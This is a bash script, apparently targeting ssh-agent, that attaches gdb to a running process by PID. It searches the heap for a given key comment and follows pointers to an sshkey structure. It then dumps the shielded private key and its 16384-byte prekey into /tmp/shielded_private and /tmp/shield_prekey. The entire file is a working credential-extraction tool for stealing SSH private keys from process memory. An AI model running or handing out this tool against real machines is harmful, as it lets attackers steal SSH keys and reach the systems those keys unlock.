#!/bin/bash

GDB=/usr/bin/gdb

if [[ $# -lt 2 ]]; then
        echo "Usage: ./script [pid] [key comment]" >&2
        exit 2
fi

PID=$1
COMMENT=$2
COMMENT_LEN=${#COMMENT}
HEAP=$(cat /proc/$PID/maps | grep heap)
#echo $HEAP
START=0x${HEAP:0:12}
END=0x${HEAP:13:12}
COMMADDR=$($GDB -p $PID -batch -ex "find $START, $END, {char[$COMMENT_LEN]}\"$COMMENT\"" 2>/dev/null | egrep ^0[xX][0-9a-fA-F]{12}$)
echo "[ - ] Searching for key comment string in memory -> Here's what I found:"
echo "$COMMADDR"
echo "[ - ] Now searching for XREFs to the comment addresses we found -> looking for heap addresses"
for i in $COMMADDR; do
        TEMPF="\x${i:12:2}\x${i:10:2}\x${i:8:2}\x${i:6:2}\x${i:4:2}\x${i:2:2}"
        TEMPPTR=$($GDB -p $PID -batch -ex "find $START, $END, {char[6]}\"$TEMPF\"" 2>/dev/null | egrep ^0[xX][0-9a-fA-F]{12}$)
        for j in $TEMPPTR; do
        VAR2=$(($j - 0x8)) # Identity->j = char *comment; Identity->(j - 0x8) = struct sshkey *key;
                VAR=$($GDB -p $PID -batch -ex "x/za $VAR2" 2>/dev/null | egrep ^0[xX][a-f0-9A-F]{12}\:) 
        VAR3=${VAR:15}
        echo "[ o ] XREF $j contains $VAR3 let's see if it is in the heap"
        if (($VAR3 > $START))
        then
            if (($VAR3 < $END))
            then
                echo "[ + ] Found a XREF in the heap $VAR3 -> searching for a sshkey struct at this address"
                KEYPOS=$(($VAR3 + 0xa0))
                KEYLEN=$($GDB -p $PID -batch -ex "x/d $KEYPOS" 2>/dev/null | egrep ^0[xX][a-f0-9A-F]{12}\:)
                echo "SHIELD_PRIVATE_LEN ${KEYLEN:15}"
                KEYLEN1=${KEYLEN:15}
                if (($KEYLEN1 != 16384)) 
                then 
                    echo "[ - ] Key not found -> now onto the next ptr"
                    continue
                else    
                    echo "[ + ] Found the shielded private key -> now dumping it"
                    SHPOS=$(($VAR3 + 0x88))
                    SPPOS=$(($VAR3 + 0x98))
                    PKEYLENPOS=$(($VAR3 + 0x90))
                    SHIELDED_PRIVATE=$($GDB -p $PID -batch -ex "x/za $SHPOS" 2>/dev/null | egrep ^0[xX][a-f0-9A-F]{12}\:)
                    SHIELDED_PREKEY=$($GDB -p $PID -batch -ex "x/za $SPPOS" 2>/dev/null | egrep ^0[xX][a-f0-9A-F]{12}\:)
                    PKEYLEN=$($GDB -p $PID -batch -ex "x/za $PKEYLENPOS"  2>/dev/null | egrep ^0[xX][a-f0-9A-F]{12}\:)
                    printf "SHIELDED_PRIVATE %s\r\n" ${SHIELDED_PRIVATE:15}
                    printf "SHIELDED_LENGTH %d\r\n" ${PKEYLEN:15}
                    printf "SHIELD_PREKEY %s\r\n" ${SHIELDED_PREKEY:15}
                    printf "SHIELD_PREKEY_LEN 16384\r\n"
                    exec $GDB -p $PID <<EOF
set \$fd = fopen("/tmp/shielded_private", "w")
call fwrite(${SHIELDED_PRIVATE:15}, 1, ${PKEYLEN:15}, \$fd)
call fflush(\$fd)
call fclose(\$fd)
set \$fd = fopen("/tmp/shield_prekey", "w")
call fwrite(${SHIELDED_PREKEY:15}, 1, 16384, \$fd)
call fflush(\$fd)
call fclose(\$fd)
detach
quit
EOF
                fi
            fi
        fi
        done
done